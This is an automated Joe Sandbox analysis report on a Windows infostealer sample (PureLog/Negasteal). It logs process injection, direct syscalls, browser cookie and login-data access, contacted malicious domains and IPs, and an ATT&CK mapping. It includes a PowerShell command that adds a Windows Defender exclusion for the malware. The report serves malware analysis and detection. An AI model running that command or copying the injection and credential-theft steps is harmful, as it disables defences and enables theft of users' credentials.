                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtOpenSection: Direct from: 0x76EF2E0C
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtQueryInformationToken: Direct from: 0x76EF2CAC
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtCreateFile: Direct from: 0x76EF2FEC
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtOpenFile: Direct from: 0x76EF2DCC
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtTerminateThread: Direct from: 0x76EF2FCC
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtOpenKeyEx: Direct from: 0x76EF2B9C
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtSetInformationProcess: Direct from: 0x76EF2C5C
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtNotifyChangeKey: Direct from: 0x76EF3C2C
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtCreateMutant: Direct from: 0x76EF35CC
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtResumeThread: Direct from: 0x76EF36AC
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtMapViewOfSection: Direct from: 0x76EF2D1C
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtProtectVirtualMemory: Direct from: 0x76EE7B2E
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtQuerySystemInformation: Direct from: 0x76EF2DFC
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtReadFile: Direct from: 0x76EF2ADC
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtDelayExecution: Direct from: 0x76EF2DDC
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtQueryInformationProcess: Direct from: 0x76EF2C26
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtResumeThread: Direct from: 0x76EF2FBC
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtCreateUserProcess: Direct from: 0x76EF371C
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtWriteVirtualMemory: Direct from: 0x76EF490C
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtSetInformationThread: Direct from: 0x76EE63F9
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtClose: Direct from: 0x76EF2B6C
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtSetInformationThread: Direct from: 0x76EF2B4C
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtReadVirtualMemory: Direct from: 0x76EF2E8C
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; NtCreateKey: Direct from: 0x76EF2C6C
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Section loaded: NULL target: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe protection: execute and read and write
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Section loaded: NULL target: C:\Windows\SysWOW64\pcaui.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\pcaui.exe; Section loaded: NULL target: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe protection: read write
                      Source: C:\Windows\SysWOW64\pcaui.exe; Section loaded: NULL target: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\pcaui.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                      Source: C:\Windows\SysWOW64\pcaui.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\pcaui.exe; Thread register set: target process: 5352
                      Source: C:\Windows\SysWOW64\pcaui.exe; Thread APC queued: target process: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 4EE9008
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe"
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe; Process created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"
                      Source: C:\Windows\SysWOW64\pcaui.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: pDqSqZXvqQcT.exe, 00000007.00000002.4467510840.0000000000CA1000.00000002.00000001.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 00000007.00000000.2080354333.0000000000CA1000.00000002.00000001.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467756194.0000000000E71000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Program Manager
                      Source: pDqSqZXvqQcT.exe, 00000007.00000002.4467510840.0000000000CA1000.00000002.00000001.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 00000007.00000000.2080354333.0000000000CA1000.00000002.00000001.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467756194.0000000000E71000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
                      Source: pDqSqZXvqQcT.exe, 00000007.00000002.4467510840.0000000000CA1000.00000002.00000001.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 00000007.00000000.2080354333.0000000000CA1000.00000002.00000001.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467756194.0000000000E71000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
                      Source: pDqSqZXvqQcT.exe, 00000007.00000002.4467510840.0000000000CA1000.00000002.00000001.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 00000007.00000000.2080354333.0000000000CA1000.00000002.00000001.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467756194.0000000000E71000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe; Queries volume information: C:\Users\user\Desktop\W3MzrFzSF0.exe VolumeInformation
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara match; File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000006.00000002.2172640781.00000000057E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000008.00000002.4467731020.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000008.00000002.4467867908.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000A.00000002.4469698131.0000000004C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000007.00000002.4467776927.0000000004AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000006.00000002.2173692414.00000000083A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0.2.W3MzrFzSF0.exe.5670000.3.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.W3MzrFzSF0.exe.5670000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.W3MzrFzSF0.exe.3d19970.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000000.00000002.2068496606.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.2070385799.0000000005670000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                      Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                      Source: C:\Windows\SysWOW64\pcaui.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\pcaui.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality

                      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                      Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                      Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                      Privilege Escalation: 612 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                      Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 612 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading
                      Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                      Discovery: 121 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 113 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
                      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                      Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                      Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                      Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                      Behavior Graph ID: 1563494, Sample: W3MzrFzSF0.exe, Startdate: 27/11/2024, Architecture: WINDOWS, Score: 100
                      Top-level signatures: Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; Yara detected PureLog Stealer; 5 other signatures
                      Top-level DNS/IP: www.rtpterbaruwaktu3.xyz; www.54248711.xyz (Performs DNS queries to domains with low reputation); 15 other IPs or domains
                      Process relationships shown in the graph:
                      W3MzrFzSF0.exe (started; dropped C:\Users\user\AppData\...\W3MzrFzSF0.exe.log, ASCII; signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes)
                        vbc.exe (started; signature: Maps a DLL or memory area into another process)
                          pDqSqZXvqQcT.exe (injected; signature: Found direct / indirect Syscall (likely to bypass EDR))
                            pcaui.exe (started; signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures)
                              pDqSqZXvqQcT.exe (injected; signature: Found direct / indirect Syscall (likely to bypass EDR); DNS/IP: rtpterbaruwaktu3.xyz 103.21.221.87; www.54248711.xyz 161.97.142.144; 11 other IPs or domains)
                              firefox.exe (started)
                        powershell.exe (started; signature: Loading BitLocker PowerShell Module)
                          WmiPrvSE.exe (started)
                          conhost.exe (started)

                      Source | Detection | Scanner | Label | Link
                      W3MzrFzSF0.exe | 42% | ReversingLabs | ByteCode-MSIL.Spyware.Negasteal |
                      W3MzrFzSF0.exe | 38% | Virustotal | | Browse
                      W3MzrFzSF0.exe | 100% | Joe Sandbox ML | |
                      No Antivirus matches
                      No Antivirus matches
                      Source | Detection | Scanner | Label | Link
                      ampsamkok88.shop | 0% | Virustotal | | Browse
IP | Domain | Country | ASN | ASN Name | Malicious
109.70.26.37 | www.mrpokrovskii.pro | Russian Federation | 48287 | RU-CENTERRU | false
209.74.77.109 | www.gogawithme.live | United States | 31744 | MULTIBAND-NEWHOPEUS | false
146.88.233.115 | smartcongress.net | France | 53589 | PLANETHOSTER-8CA | false
8.210.114.150 | www.llljjjiii.shop | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
199.59.243.227 | www.acond-22-mvr.click | United States | 395082 | BODIS-NJUS | false
208.91.197.27 | www.matteicapital.online | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | false
38.47.232.124 | 70kdd.top | United States | 174 | COGENT-174US | false
161.97.142.144 | www.54248711.xyz | United States | 51167 | CONTABODE | true
103.21.221.87 | rtpterbaruwaktu3.xyz | unknown | 9905 | LINKNET-ID-APLinknetASNID | true
172.67.138.37 | www.questmatch.pro | United States | 13335 | CLOUDFLARENETUS | false
47.76.213.197 | www.ytsd88.top | United States | 9500 | VODAFONE-TRANSIT-ASVodafoneNZLtdNZ | false
185.27.134.206 | www.canadavinreport.site | United Kingdom | 34119 | WILDCARD-ASWildcardUKLimitedGB | false
3.33.130.190 | ampsamkok88.shop | United States | 8987 | AMAZONEXPANSIONGB | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1563494
Start date and time: 2024-11-27 01:24:02 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: W3MzrFzSF0.exe (renamed because original name is a hash value)
Original Sample Name: 122baa2b0520a7dd37025a89bccf9fcaf87f99519bfc0ec84a4a48cddb6f9b6d.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@11/7@16/13
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 119
• Number of non-executed functions: 276
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
19:24:48 | API Interceptor | 4x Sleep call for process: W3MzrFzSF0.exe modified
19:24:51 | API Interceptor | 14x Sleep call for process: powershell.exe modified
19:25:42 | API Interceptor | 10506637x Sleep call for process: pcaui.exe modified
                                                                                  Process:C:\Users\user\Desktop\W3MzrFzSF0.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1216
                                                                                  Entropy (8bit):5.34331486778365
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
                                                                                  MD5:E193AFF55D4BDD9951CB4287A7D79653
                                                                                  SHA1:F94AD920B9E0EB43B5005D74552AB84EAA38E985
                                                                                  SHA-256:08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
                                                                                  SHA-512:86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
                                                                                  Malicious:true
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
